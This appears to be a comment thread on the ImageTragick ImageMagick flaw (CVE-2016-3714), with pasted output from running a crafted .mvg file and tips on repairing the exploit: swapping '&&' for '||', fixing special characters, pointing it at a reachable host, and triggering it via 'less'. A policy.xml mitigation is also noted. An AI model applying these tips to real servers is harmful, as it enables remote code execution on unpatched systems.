This is what I get on an unpatched staging server. Not sure it did anything...

    $ sudo convert file.mvg o.png
    convert.im6: delegate failed `"curl" -s -k -o "%o" "https:%M"' @ error/delegate.c/InvokeDelegate/1065.
    convert.im6: unable to open image `/tmp/magick-Yjc5q9f1': No such file or directory @ > error/blob.c/OpenBlob/2638.
    convert.im6: unable to open file `/tmp/magick-Yjc5q9f1': No such file or directory @ error/constitute.c/ReadImage/583.

if https://test can't be opened by curl then the rest of the commands will fail because they are chained by &&. if you change the first && to || then it will work.

I assumed that "bug" was added intentionally as a script kiddie deterrence...

Can confirm that I was able to reproduce after tweaking some of the special characters in the above PoC.

Works for me (with a slight bugfix to the .mvg) :O

The policy.xml workaround mentioned here seems to stop it https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2016-3714

You can trigger the code execution by just using "less" on the mvg file, as it uses ImageMagick if it's installed :)

Replace `test` with `example.com` et voila.